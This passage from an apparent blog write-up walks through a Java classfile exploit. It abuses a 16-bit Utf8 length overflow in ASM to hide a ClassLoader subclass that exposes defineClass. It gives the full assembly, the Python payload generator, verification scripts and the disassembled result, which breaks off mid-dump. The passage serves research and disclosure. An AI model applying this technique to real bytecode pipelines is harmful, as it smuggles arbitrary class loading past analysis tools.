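Note that a length such as 7A80 is below 7F7F but still unusable, because its low byte is above 7F.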

Since we now have an extra three bytes of Utf8 headers, we don’t need the odd non-null byte and can divide up the remaining (65536 - 3022)//2 = 31257 null bytes between the two. Since 31257 is odd, the split can’t be even, so we’ll put 15628 null bytes in the first wrapper and 15629 in the second, resulting in hex lengths of 7A18 and 7A1A respectively.

s += '017A18'.decode('hex') + '\x00' * (0x7A18 // 2)
s += '017A1A'.decode('hex') + '\x00' * (0x7A1A // 2)
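The snippets in this post use Python 2's str.decode('hex'). For anyone following along in Python 3, here is a rough port of the script so far, together with a check that the encoded length really is 65536. The mutf8_encode helper is a simplified stand-in for ASM's encoder that only handles the code points used here, and the class name is assumed to be "Exploit/" padded with x to 257 bytes.

```python
def mutf8_encode(raw):
    """Encode code points 00-7F (one per input byte) as classfile MUTF-8."""
    out = bytearray()
    for b in raw:
        if b > 0x7F:
            raise ValueError("code points above 7F are out of scope for this sketch")
        # A null character is stored as the two bytes C0 80; 01-7F are stored as-is.
        out += b"\xC0\x80" if b == 0 else bytes([b])
    return bytes(out)

INT_DUMMY = bytes.fromhex("0301010101")

s = bytes.fromhex("010101") + b"Exploit/".ljust(257, b"x")
s += bytes.fromhex("07010C0C010101030A010D010E0C010501070A02050110")
s += INT_DUMMY * (0x205 - 0x112)
s += bytes.fromhex("070109")
s += INT_DUMMY * (0x300 - 0x206)
s += bytes.fromhex("010101") + b"sneakyLoad".ljust(257, b"_")
s += INT_DUMMY
hidden_len = len(s)   # bytes of hidden constants before the wrappers

s += bytes.fromhex("017A18") + b"\x00" * (0x7A18 // 2)
s += bytes.fromhex("017A1A") + b"\x00" * (0x7A1A // 2)

encoded = mutf8_encode(s)
print(hidden_len)
print(len(encoded))
print(len(encoded) & 0xFFFF)   # what survives in a two-byte length field
```

The last line shows the value that ends up in the length field once only the low 16 bits are kept.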

Finishing touches, or math is hard

The first time I recreated this exploit while working on the blog post, I made some minor miscalculations, so I had to adjust the numbers a bit at the end to make it all work.

Recall that the first long constant shown above is ldc2_w 0x------0001------L. That 0001 is the access_flags of the classfile, which means that the three bytes that come before it in the long are actually part of the constant pool.

This means that there are seven bytes sticking out into the constant pool: the three bytes of the String constant that ASM creates pointing to the Utf8 for evilstring, the tag byte of the long constant, and the first three bytes of the long itself. Luckily, we can cover this up by adding 7 to the length of the final hidden wrapper Utf8 so it will include those seven bytes:

s += '017A18'.decode('hex') + '\x00' * (0x7A18 // 2)
s += '017A21'.decode('hex') + '\x00' * (0x7A1A // 2)

As for the first three bytes of the long, we can fill them in with anything that is valid MUTF-8 (I chose 333333 below).
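At this point every placeholder has a value, so the tiling can be checked mechanically. The Python 3 sketch below writes out the Int and Long constants the way they appear in a constant pool (tag byte, then big-endian payload), skips the first tag byte and the three filler bytes, and parses the rest the way the JVM would after the overflow. The constant values are the ones from the final listing; serialize and parse_class_body are hypothetical helpers, and the parser only handles the layout used here (no interfaces, no fields).

```python
import struct

TAG = {"int": 3, "long": 5}
SIZE = {"int": 4, "long": 8}

CONSTANTS = [
    ("long", 0x3333330001010D02), ("long", 0x0000000000020001),
    ("int", 0x00000700),
    ("long", 0x00090000001C0042), ("long", 0x00000000102A2B2C),
    ("long", 0x57032CBE2DB6010F), ("long", 0x57B0000000000000),
    ("long", 0x00000003AAAAAA00), ("long", 0x00000003BBBBBB00),
    ("long", 0x00000003CCCCCC00), ("long", 0x00000006DDDDDDDD),
    ("long", 0x0000010105010700),
    ("long", 0x00090000001C0043), ("long", 0x00000000102A0000),
    ("long", 0x57B70111B1000000), ("long", 0x5700000000000000),
    ("long", 0x0000000366666600), ("long", 0x0000000377777700),
    ("long", 0x0000000388888800), ("long", 0x00000E2599999999),
]

def serialize(constants):
    out = bytearray()
    for kind, value in constants:
        out.append(TAG[kind])
        out += value.to_bytes(SIZE[kind], "big")
    return bytes(out)

def parse_class_body(data):
    (access, this_cls, super_cls,
     n_interfaces, n_fields, n_methods) = struct.unpack_from(">6H", data, 0)
    assert n_interfaces == 0 and n_fields == 0, "sketch only handles this layout"
    pos = 12
    methods = []
    for _ in range(n_methods):
        flags, name, desc, n_attrs = struct.unpack_from(">4H", data, pos)
        pos += 8
        attrs = []
        for _ in range(n_attrs):
            attr_name, length = struct.unpack_from(">HI", data, pos)
            pos += 6
            # The last attribute claims more bytes than we have; slicing truncates.
            attrs.append((attr_name, length, data[pos:pos + length]))
            pos += length
        methods.append({"name": name, "desc": desc, "attrs": attrs})
    return {"this": this_cls, "super": super_cls, "methods": methods}

# Skip the first Long's tag byte and the three filler bytes (333333),
# which the JVM treats as part of the last wrapper Utf8.
body = serialize(CONSTANTS)[4:]
view = parse_class_body(body)

print("this=%04X super=%04X" % (view["this"], view["super"]))
for m in view["methods"]:
    print("method name=%04X desc=%04X" % (m["name"], m["desc"]))
    for attr_name, length, data in m["attrs"]:
        print("  attr name=%04X length=%08X" % (attr_name, length))
```

Because ASM merges identical constants, it is also worth confirming that len(set(CONSTANTS)) equals len(CONSTANTS) before assembling.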

One last thing

We added hundreds of hidden constants to (the JVM’s view of) the constant pool, embedded in our evilstring so ASM doesn’t know about them. However, the way the JVM knows when to stop parsing constant pool entries is when it reaches the number specified in the constant pool count field, which appears before the constant pool entries.

This means that the JVM parses a number of constant pool entries equal to the count field written by ASM and thus equal to the number of constant pool entries that ASM knows about. Therefore, the JVM won’t know to continue parsing our hidden constants and will instead attempt to parse them as the rest of the classfile rather than as constants, and thus crash.

Therefore, we need to adjust the constant pool count as seen by ASM to match the count that we want the JVM to see. We can do this by adding the appropriate number of dummy strings after everything else:

        ldc2_w 0x0000000388888800L
        ldc2_w 0x00000E2599999999L

        ; dummy strings added here
        ldc_w "s_134"
        ldc_w "s_136"
        ldc_w "s_138"
        ...
        ldc_w "s_2fe"
        ldc_w "s_300"
        ldc_w "s_302"
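The range of trailing dummy strings can be derived rather than guessed. The Python 3 sketch below assumes the indices worked out above: ASM places the Utf8 for evilstring at 010B, Long constants occupy two indices each, and in the JVM's view the last hidden constant (the second wrapper Utf8) sits at 0303, right after [sneakyLoad_utf] at 0300, the leftover dummy at 0301 and the first wrapper at 0302.

```python
# ASM's view: walk the indices used by evilstring and the tiled constants.
index = 0x010B          # Utf8 entry for evilstring
index += 2              # that Utf8 plus the String entry pointing to it
for kind in ["long", "long", "int"] + ["long"] * 17:
    index += 2 if kind == "long" else 1   # a Long takes up two indices

# JVM's view: constant_pool_count is one more than the highest index.
jvm_last_hidden = 0x0303
jvm_pool_count = jvm_last_hidden + 1

# Each trailing dummy literal adds a Utf8 and a String entry.
trailing = ["s_%x" % i for i in range(index, jvm_pool_count, 2)]
asm_pool_count = index + 2 * len(trailing)

print("first dummy: %s, last dummy: %s, total: %d"
      % (trailing[0], trailing[-1], len(trailing)))
print("ASM count %04X, JVM count %04X" % (asm_pool_count, jvm_pool_count))
```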

Putting it all together

Now, we are finally done writing the exploit class for real. Here is our complete, final code:

.class public Exploit/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
.super java/lang/Object

.method public woodlelyDoodlely : ()I
    .code stack 2000 locals 10
        ldc_w "(Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "Code"
        ldc_w "s_b"
        ldc_w "s_d"
        ldc_w "s_f"
        ldc_w "s_11"
        ldc_w "s_13"
        ldc_w "s_15"
        ldc_w "s_17"
        ldc_w "s_19"
        ldc_w "s_1b"
        ldc_w "s_1d"
        ldc_w "s_1f"
        ldc_w "s_21"
        ldc_w "s_23"
        ldc_w "s_25"
        ldc_w "s_27"
        ldc_w "s_29"
        ldc_w "s_2b"
        ldc_w "s_2d"
        ldc_w "s_2f"
        ldc_w "s_31"
        ldc_w "s_33"
        ldc_w "s_35"
        ldc_w "s_37"
        ldc_w "s_39"
        ldc_w "s_3b"
        ldc_w "s_3d"
        ldc_w "s_3f"
        ldc_w "s_41"
        ldc_w "s_43"
        ldc_w "s_45"
        ldc_w "s_47"
        ldc_w "s_49"
        ldc_w "s_4b"
        ldc_w "s_4d"
        ldc_w "s_4f"
        ldc_w "s_51"
        ldc_w "s_53"
        ldc_w "s_55"
        ldc_w "s_57"
        ldc_w "s_59"
        ldc_w "s_5b"
        ldc_w "s_5d"
        ldc_w "s_5f"
        ldc_w "s_61"
        ldc_w "s_63"
        ldc_w "s_65"
        ldc_w "s_67"
        ldc_w "s_69"
        ldc_w "s_6b"
        ldc_w "s_6d"
        ldc_w "s_6f"
        ldc_w "s_71"
        ldc_w "s_73"
        ldc_w "s_75"
        ldc_w "s_77"
        ldc_w "s_79"
        ldc_w "s_7b"
        ldc_w "s_7d"
        ldc_w "s_7f"
        ldc_w "s_81"
        ldc_w "s_83"
        ldc_w "s_85"
        ldc_w "s_87"
        ldc_w "s_89"
        ldc_w "s_8b"
        ldc_w "s_8d"
        ldc_w "s_8f"
        ldc_w "s_91"
        ldc_w "s_93"
        ldc_w "s_95"
        ldc_w "s_97"
        ldc_w "s_99"
        ldc_w "s_9b"
        ldc_w "s_9d"
        ldc_w "s_9f"
        ldc_w "s_a1"
        ldc_w "s_a3"
        ldc_w "s_a5"
        ldc_w "s_a7"
        ldc_w "s_a9"
        ldc_w "s_ab"
        ldc_w "s_ad"
        ldc_w "s_af"
        ldc_w "s_b1"
        ldc_w "s_b3"
        ldc_w "s_b5"
        ldc_w "s_b7"
        ldc_w "s_b9"
        ldc_w "s_bb"
        ldc_w "s_bd"
        ldc_w "s_bf"
        ldc_w "s_c1"
        ldc_w "s_c3"
        ldc_w "s_c5"
        ldc_w "s_c7"
        ldc_w "s_c9"
        ldc_w "s_cb"
        ldc_w "s_cd"
        ldc_w "s_cf"
        ldc_w "s_d1"
        ldc_w "s_d3"
        ldc_w "s_d5"
        ldc_w "s_d7"
        ldc_w "s_d9"
        ldc_w "s_db"
        ldc_w "s_dd"
        ldc_w "s_df"
        ldc_w "s_e1"
        ldc_w "s_e3"
        ldc_w "s_e5"
        ldc_w "s_e7"
        ldc_w "s_e9"
        ldc_w "s_eb"
        ldc_w "s_ed"
        ldc_w "s_ef"
        ldc_w "s_f1"
        ldc_w "s_f3"
        ldc_w "s_f5"
        ldc_w "s_f7"
        ldc_w "s_f9"
        ldc_w "s_fb"
        ldc_w "s_fd"
        ldc_w "s_ff"

        ldc_w "defineClass"
        ldc_w "(Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "<init>"
        ldc_w "()V"
        ldc_w "java/lang/ClassLoader"

        ldc_w "evilstring"

        ldc2_w 0x3333330001010d02L
        ldc2_w 0x0000000000020001L
        ldc_w  0x00000700
        ldc2_w 0x00090000001C0042L
        ldc2_w 0x00000000102A2B2CL
        ldc2_w 0x57032CBE2DB6010FL
        ldc2_w 0x57B0000000000000L
        ldc2_w 0x00000003AAAAAA00L
        ldc2_w 0x00000003BBBBBB00L
        ldc2_w 0x00000003CCCCCC00L
        ldc2_w 0x00000006DDDDDDDDL
        ldc2_w 0x0000010105010700L
        ldc2_w 0x00090000001C0043L
        ldc2_w 0x00000000102A0000L
        ldc2_w 0x57B70111B1000000L
        ldc2_w 0x5700000000000000L
        ldc2_w 0x0000000366666600L
        ldc2_w 0x0000000377777700L
        ldc2_w 0x0000000388888800L
        ldc2_w 0x00000E2599999999L


        ldc_w "s_134"
        ldc_w "s_136"
        ldc_w "s_138"
        ldc_w "s_13a"
        ldc_w "s_13c"
        ldc_w "s_13e"
        ldc_w "s_140"
        ldc_w "s_142"
        ldc_w "s_144"
        ldc_w "s_146"
        ldc_w "s_148"
        ldc_w "s_14a"
        ldc_w "s_14c"
        ldc_w "s_14e"
        ldc_w "s_150"
        ldc_w "s_152"
        ldc_w "s_154"
        ldc_w "s_156"
        ldc_w "s_158"
        ldc_w "s_15a"
        ldc_w "s_15c"
        ldc_w "s_15e"
        ldc_w "s_160"
        ldc_w "s_162"
        ldc_w "s_164"
        ldc_w "s_166"
        ldc_w "s_168"
        ldc_w "s_16a"
        ldc_w "s_16c"
        ldc_w "s_16e"
        ldc_w "s_170"
        ldc_w "s_172"
        ldc_w "s_174"
        ldc_w "s_176"
        ldc_w "s_178"
        ldc_w "s_17a"
        ldc_w "s_17c"
        ldc_w "s_17e"
        ldc_w "s_180"
        ldc_w "s_182"
        ldc_w "s_184"
        ldc_w "s_186"
        ldc_w "s_188"
        ldc_w "s_18a"
        ldc_w "s_18c"
        ldc_w "s_18e"
        ldc_w "s_190"
        ldc_w "s_192"
        ldc_w "s_194"
        ldc_w "s_196"
        ldc_w "s_198"
        ldc_w "s_19a"
        ldc_w "s_19c"
        ldc_w "s_19e"
        ldc_w "s_1a0"
        ldc_w "s_1a2"
        ldc_w "s_1a4"
        ldc_w "s_1a6"
        ldc_w "s_1a8"
        ldc_w "s_1aa"
        ldc_w "s_1ac"
        ldc_w "s_1ae"
        ldc_w "s_1b0"
        ldc_w "s_1b2"
        ldc_w "s_1b4"
        ldc_w "s_1b6"
        ldc_w "s_1b8"
        ldc_w "s_1ba"
        ldc_w "s_1bc"
        ldc_w "s_1be"
        ldc_w "s_1c0"
        ldc_w "s_1c2"
        ldc_w "s_1c4"
        ldc_w "s_1c6"
        ldc_w "s_1c8"
        ldc_w "s_1ca"
        ldc_w "s_1cc"
        ldc_w "s_1ce"
        ldc_w "s_1d0"
        ldc_w "s_1d2"
        ldc_w "s_1d4"
        ldc_w "s_1d6"
        ldc_w "s_1d8"
        ldc_w "s_1da"
        ldc_w "s_1dc"
        ldc_w "s_1de"
        ldc_w "s_1e0"
        ldc_w "s_1e2"
        ldc_w "s_1e4"
        ldc_w "s_1e6"
        ldc_w "s_1e8"
        ldc_w "s_1ea"
        ldc_w "s_1ec"
        ldc_w "s_1ee"
        ldc_w "s_1f0"
        ldc_w "s_1f2"
        ldc_w "s_1f4"
        ldc_w "s_1f6"
        ldc_w "s_1f8"
        ldc_w "s_1fa"
        ldc_w "s_1fc"
        ldc_w "s_1fe"
        ldc_w "s_200"
        ldc_w "s_202"
        ldc_w "s_204"
        ldc_w "s_206"
        ldc_w "s_208"
        ldc_w "s_20a"
        ldc_w "s_20c"
        ldc_w "s_20e"
        ldc_w "s_210"
        ldc_w "s_212"
        ldc_w "s_214"
        ldc_w "s_216"
        ldc_w "s_218"
        ldc_w "s_21a"
        ldc_w "s_21c"
        ldc_w "s_21e"
        ldc_w "s_220"
        ldc_w "s_222"
        ldc_w "s_224"
        ldc_w "s_226"
        ldc_w "s_228"
        ldc_w "s_22a"
        ldc_w "s_22c"
        ldc_w "s_22e"
        ldc_w "s_230"
        ldc_w "s_232"
        ldc_w "s_234"
        ldc_w "s_236"
        ldc_w "s_238"
        ldc_w "s_23a"
        ldc_w "s_23c"
        ldc_w "s_23e"
        ldc_w "s_240"
        ldc_w "s_242"
        ldc_w "s_244"
        ldc_w "s_246"
        ldc_w "s_248"
        ldc_w "s_24a"
        ldc_w "s_24c"
        ldc_w "s_24e"
        ldc_w "s_250"
        ldc_w "s_252"
        ldc_w "s_254"
        ldc_w "s_256"
        ldc_w "s_258"
        ldc_w "s_25a"
        ldc_w "s_25c"
        ldc_w "s_25e"
        ldc_w "s_260"
        ldc_w "s_262"
        ldc_w "s_264"
        ldc_w "s_266"
        ldc_w "s_268"
        ldc_w "s_26a"
        ldc_w "s_26c"
        ldc_w "s_26e"
        ldc_w "s_270"
        ldc_w "s_272"
        ldc_w "s_274"
        ldc_w "s_276"
        ldc_w "s_278"
        ldc_w "s_27a"
        ldc_w "s_27c"
        ldc_w "s_27e"
        ldc_w "s_280"
        ldc_w "s_282"
        ldc_w "s_284"
        ldc_w "s_286"
        ldc_w "s_288"
        ldc_w "s_28a"
        ldc_w "s_28c"
        ldc_w "s_28e"
        ldc_w "s_290"
        ldc_w "s_292"
        ldc_w "s_294"
        ldc_w "s_296"
        ldc_w "s_298"
        ldc_w "s_29a"
        ldc_w "s_29c"
        ldc_w "s_29e"
        ldc_w "s_2a0"
        ldc_w "s_2a2"
        ldc_w "s_2a4"
        ldc_w "s_2a6"
        ldc_w "s_2a8"
        ldc_w "s_2aa"
        ldc_w "s_2ac"
        ldc_w "s_2ae"
        ldc_w "s_2b0"
        ldc_w "s_2b2"
        ldc_w "s_2b4"
        ldc_w "s_2b6"
        ldc_w "s_2b8"
        ldc_w "s_2ba"
        ldc_w "s_2bc"
        ldc_w "s_2be"
        ldc_w "s_2c0"
        ldc_w "s_2c2"
        ldc_w "s_2c4"
        ldc_w "s_2c6"
        ldc_w "s_2c8"
        ldc_w "s_2ca"
        ldc_w "s_2cc"
        ldc_w "s_2ce"
        ldc_w "s_2d0"
        ldc_w "s_2d2"
        ldc_w "s_2d4"
        ldc_w "s_2d6"
        ldc_w "s_2d8"
        ldc_w "s_2da"
        ldc_w "s_2dc"
        ldc_w "s_2de"
        ldc_w "s_2e0"
        ldc_w "s_2e2"
        ldc_w "s_2e4"
        ldc_w "s_2e6"
        ldc_w "s_2e8"
        ldc_w "s_2ea"
        ldc_w "s_2ec"
        ldc_w "s_2ee"
        ldc_w "s_2f0"
        ldc_w "s_2f2"
        ldc_w "s_2f4"
        ldc_w "s_2f6"
        ldc_w "s_2f8"
        ldc_w "s_2fa"
        ldc_w "s_2fc"
        ldc_w "s_2fe"
        ldc_w "s_300"
        ldc_w "s_302"

        iconst_0
        ireturn
    .end code
.end method
.end class

Here, "evilstring" is replaced with the value generated by this Python 2 script:

s = '010101'.decode('hex') + 'Exploit/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
s += '07010C0C010101030A010D010E0C010501070A02050110'.decode('hex')
s += '0301010101'.decode('hex') * (0x205 - 0x112)
s += '070109'.decode('hex')
s += '0301010101'.decode('hex') * (0x300 - 0x206)


s += '010101'.decode('hex') + 'sneakyLoad'.ljust(257, '_')

s += '0301010101'.decode('hex')

s += '017A18'.decode('hex') + '\x00' * (0x7A18 // 2)
s += '017A21'.decode('hex') + '\x00' * (0x7A1A // 2)


print len(s), 'bytes'
print len(s.replace('\x00', '\xC0\x80')), 'encoded bytes'
open('evilstring', 'wb').write(s)
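
The two NUL padding lengths at the end of the script are not arbitrary. As a rough check, here is a Python 3 port of just the length arithmetic. It assumes the class name is exactly 257 characters (which is what its 010101 header, a Utf8 tag followed by length 0x0101, suggests) and that the writer stores the encoded length in the 16-bit length field the classfile format uses for Utf8 constants. The helper names are my own and are not part of the original exploit.

```python
def h(hexstr: str) -> bytes:
    """Python 3 stand-in for the original script's str.decode('hex')."""
    return bytes.fromhex(hexstr)


def build_evilstring() -> bytes:
    # ASSUMPTION: the class name is padded to 257 characters so that it
    # matches the 0x0101 length in the fake Utf8 header in front of it.
    s = h('010101') + b'Exploit/'.ljust(257, b'x')
    s += h('07010C0C010101030A010D010E0C010501070A02050110')
    s += h('0301010101') * (0x205 - 0x112)
    s += h('070109')
    s += h('0301010101') * (0x300 - 0x206)
    s += h('010101') + b'sneakyLoad'.ljust(257, b'_')
    s += h('0301010101')
    s += h('017A18') + b'\x00' * (0x7A18 // 2)
    s += h('017A21') + b'\x00' * (0x7A1A // 2)
    return s


def modified_utf8_length(s: bytes) -> int:
    """Length after encoding NUL as C0 80, as modified UTF-8 does.

    This shortcut is only valid because every byte in the payload is
    below 0x80, so all other characters take exactly one byte each.
    """
    assert max(s) < 0x80
    return len(s.replace(b'\x00', b'\xC0\x80'))


s = build_evilstring()
raw_len = len(s)                       # number of characters in the string
encoded_len = modified_utf8_length(s)  # number of bytes actually written
stored_len = encoded_len & 0xFFFF      # what fits in a 16-bit length field

print(raw_len, encoded_len, hex(stored_len))
```

Under these assumptions the string is 34279 characters long, comfortably below the 65535 limit, while its encoded form is exactly 65536 bytes, so a length truncated to 16 bits comes out as 0. Everything after that length field is then free to be parsed as something other than string data.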

We can now assemble this classfile, run it through ASM with no bytecode transforms, and disassemble the result to see what happens. Almost as if by magic, a rather different and more sinister classfile comes out the other side:

.version 49 0 
.class public Exploit/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
.super java/lang/ClassLoader 

.method public sneakyLoad_______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ : (Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class; 
    .code stack 66 locals 1280 
L0:     aload_0 
L1:     aload_1 
L2:     aload_2 
L3:     iconst_2 
L4:     pop 
L5:     iconst_0 
L6:     aload_2 
L7:     arraylength 
L8:     aload_3 
L9:     invokevirtual Method Exploit/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx defineClass (Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class; 
L12:    iconst_2 
L13:    pop 
L14:    areturn 
L15:    nop 
L16:    
    .end code 
    .attribute woodlelyDoodlely b'\xaa\xaa\xaa' 
    .attribute woodlelyDoodlely b'\xbb\xbb\xbb' 
    .attribute woodlelyDoodlely b'\xcc\xcc\xcc' 
    .attribute woodlelyDoodlely b'\xdd\xdd\xdd\xdd\x05\x00' 
.end method 

.method public <init> : ()V 
    .code stack 67 locals 1280 
L0:     aload_0 
L1:     nop 
L2:     nop 
L3:     iconst_2 
L4:     pop 
L5:     invokespecial Method java/lang/ClassLoader <init> ()V 
L8:     return 
L9:     nop 
L10:    nop 
L11:    nop 
L12:    iconst_2 
L13:    pop 
L14:    nop 
L15:    nop 
L16:    
    .end code 
    .attribute woodlelyDoodlely b'fff' 
    .attribute woodlelyDoodlely b'www' 
    .attribute woodlelyDoodlely b'\x88\x88\x88' 
    .attribute woodlelyDoodlely b'\x99\x99\x99\x99\x01\x00\x05s_134\x08\x014\x01\x00\x05s_136\x08\x016\x01\x00\x05s_138\x08\x018\x01\x00\x05s_13a\x08\x01:\x01\x00\x05s_13c\x08\x01<\x01\x00\x05s_13e\x08\x01>\x01\x00\x05s_140\x08\x01@\x01\x00\x05s_142\x08\x01B\x01\x00\x05s_144\x08\x01D\x01\x00\x05s_146\x08\x01F\x01\x00\x05s_148\x08\x01H\x01\x00\x05s_14a\x08\x01J\x01\x00\x05s_14c\x08\x01L\x01\x00\x05s_14e\x08\x01N\x01\x00\x05s_150\x08\x01P\x01\x00\x05s_152\x08\x01R\x01\x00\x05s_154\x08\x01T\x01\x00\x05s_156\x08\x01V\x01\x00\x05s_158\x08\x01X\x01\x00\x05s_15a\x08\x01Z\x01\x00\x05s_15c\x08\x01\\\x01\x00\x05s_15e\x08\x01^\x01\x00\x05s_160\x08\x01`\x01\x00\x05s_162\x08\x01b\x01\x00\x05s_164\x08\x01d\x01\x00\x05s_166\x08\x01f\x01\x00\x05s_168\x08\x01h\x01\x00\x05s_16a\x08\x01j\x01\x00\x05s_16c\x08\x01l\x01\x00\x05s_16e\x08\x01n\x01\x00\x05s_170\x08\x01p\x01\x00\x05s_172\x08\x01r\x01\x00\x05s_174\x08\x01t\x01\x00\x05s_176\x08\x01v\x01\x00\x05s_178\x08\x01x\x01\x00\x05s_17a\x08\x01z\x01\x00\x05s_17c\x08\x01|\x01\x00\x05s_17e\x08\x01~\x01\x00\x05s_180\x08\x01\x80\x01\x00\x05s_182\x08\x01\x82\x01\x00\x05s_184\x08\x01\x84\x01\x00\x05s_186\x08\x01\x86\x01\x00\x05s_188\x08\x01\x88\x01\x00\x05s_18a\x08\x01\x8a\x01\x00\x05s_18c\x08\x01\x8c\x01\x00\x05s_18e\x08\x01\x8e\x01\x00\x05s_190\x08\x01\x90\x01\x00\x05s_192\x08\x01\x92\x01\x00\x05s_194\x08\x01\x94\x01\x00\x05s_196\x08\x01\x96\x01\x00\x05s_198\x08\x01\x98\x01\x00\x05s_19a\x08\x01\x9a\x01\x00\x05s_19c\x08\x01\x9c\x01\x00\x05s_19e\x08\x01\x9e\x01\x00\x05s_1a0\x08\x01\xa0\x01\x00\x05s_1a2\x08\x01\xa2\x01\x00\x05s_1a4\x08\x01\xa4\x01\x00\x05s_1a6\x08\x01\xa6\x01\x00\x05s_1a8\x08\x01\xa8\x01\x00\x05s_1aa\x08\x01\xaa\x01\x00\x05s_1ac\x08\x01\xac\x01\x00\x05s_1ae\x08\x01\xae\x01\x00\x05s_1b0\x08\x01\xb0\x01\x00\x05s_1b2\x08\x01\xb2\x01\x00\x05s_1b4\x08\x01\xb4\x01\x00\x05s_1b6\x08\x01\xb6\x01\x00\x05s_1b8\x08\x01\xb8\x01\x00\x05s_1ba\x08\x01\xba\x01\x00\x05s_1bc\x08\x01\xbc\x01\x00\x05s_1be\x08\x01\xbe\x01\x00\x05s_1c0\x08\x01\xc0\x01
\x00\x05s_1c2\x08\x01\xc2\x01\x00\x05s_1c4\x08\x01\xc4\x01\x00\x05s_1c6\x08\x01\xc6\x01\x00\x05s_1c8\x08\x01\xc8\x01\x00\x05s_1ca\x08\x01\xca\x01\x00\x05s_1cc\x08\x01\xcc\x01\x00\x05s_1ce\x08\x01\xce\x01\x00\x05s_1d0\x08\x01\xd0\x01\x00\x05s_1d2\x08\x01\xd2\x01\x00\x05s_1d4\x08\x01\xd4\x01\x00\x05s_1d6\x08\x01\xd6\x01\x00\x05s_1d8\x08\x01\xd8\x01\x00\x05s_1da\x08\x01\xda\x01\x00\x05s_1dc\x08\x01\xdc\x01\x00\x05s_1de\x08\x01\xde\x01\x00\x05s_1e0\x08\x01\xe0\x01\x00\x05s_1e2\x08\x01\xe2\x01\x00\x05s_1e4\x08\x01\xe4\x01\x00\x05s_1e6\x08\x01\xe6\x01\x00\x05s_1e8\x08\x01\xe8\x01\x00\x05s_1ea\x08\x01\xea\x01\x00\x05s_1ec\x08\x01\xec\x01\x00\x05s_1ee\x08\x01\xee\x01\x00\x05s_1f0\x08\x01\xf0\x01\x00\x05s_1f2\x08\x01\xf2\x01\x00\x05s_1f4\x08\x01\xf4\x01\x00\x05s_1f6\x08\x01\xf6\x01\x00\x05s_1f8\x08\x01\xf8\x01\x00\x05s_1fa\x08\x01\xfa\x01\x00\x05s_1fc\x08\x01\xfc\x01\x00\x05s_1fe\x08\x01\xfe\x01\x00\x05s_200\x08\x02\x00\x01\x00\x05s_202\x08\x02\x02\x01\x00\x05s_204\x08\x02\x04\x01\x00\x05s_206\x08\x02\x06\x01\x00\x05s_208\x08\x02\x08\x01\x00\x05s_20a\x08\x02\n\x01\x00\x05s_20c\x08\x02\x0c\x01\x00\x05s_20e\x08\x02\x0e\x01\x00\x05s_210\x08\x02\x10\x01\x00\x05s_212\x08\x02\x12\x01\x00\x05s_214\x08\x02\x14\x01\x00\x05s_216\x08\x02\x16\x01\x00\x05s_218\x08\x02\x18\x01\x00\x05s_21a\x08\x02\x1a\x01\x00\x05s_21c\x08\x02\x1c\x01\x00\x05s_21e\x08\x02\x1e\x01\x00\x05s_220\x08\x02 
\x01\x00\x05s_222\x08\x02"\x01\x00\x05s_224\x08\x02$\x01\x00\x05s_226\x08\x02&\x01\x00\x05s_228\x08\x02(\x01\x00\x05s_22a\x08\x02*\x01\x00\x05s_22c\x08\x02,\x01\x00\x05s_22e\x08\x02.\x01\x00\x05s_230\x08\x020\x01\x00\x05s_232\x08\x022\x01\x00\x05s_234\x08\x024\x01\x00\x05s_236\x08\x026\x01\x00\x05s_238\x08\x028\x01\x00\x05s_23a\x08\x02:\x01\x00\x05s_23c\x08\x02<\x01\x00\x05s_23e\x08\x02>\x01\x00\x05s_240\x08\x02@\x01\x00\x05s_242\x08\x02B\x01\x00\x05s_244\x08\x02D\x01\x00\x05s_246\x08\x02F\x01\x00\x05s_248\x08\x02H\x01\x00\x05s_24a\x08\x02J\x01\x00\x05s_24c\x08\x02L\x01\x00\x05s_24e\x08\x02N\x01\x00\x05s_250\x08\x02P\x01\x00\x05s_252\x08\x02R\x01\x00\x05s_254\x08\x02T\x01\x00\x05s_256\x08\x02V\x01\x00\x05s_258\x08\x02X\x01\x00\x05s_25a\x08\x02Z\x01\x00\x05s_25c\x08\x02\\\x01\x00\x05s_25e\x08\x02^\x01\x00\x05s_260\x08\x02`\x01\x00\x05s_262\x08\x02b\x01\x00\x05s_264\x08\x02d\x01\x00\x05s_266\x08\x02f\x01\x00\x05s_268\x08\x02h\x01\x00\x05s_26a\x08\x02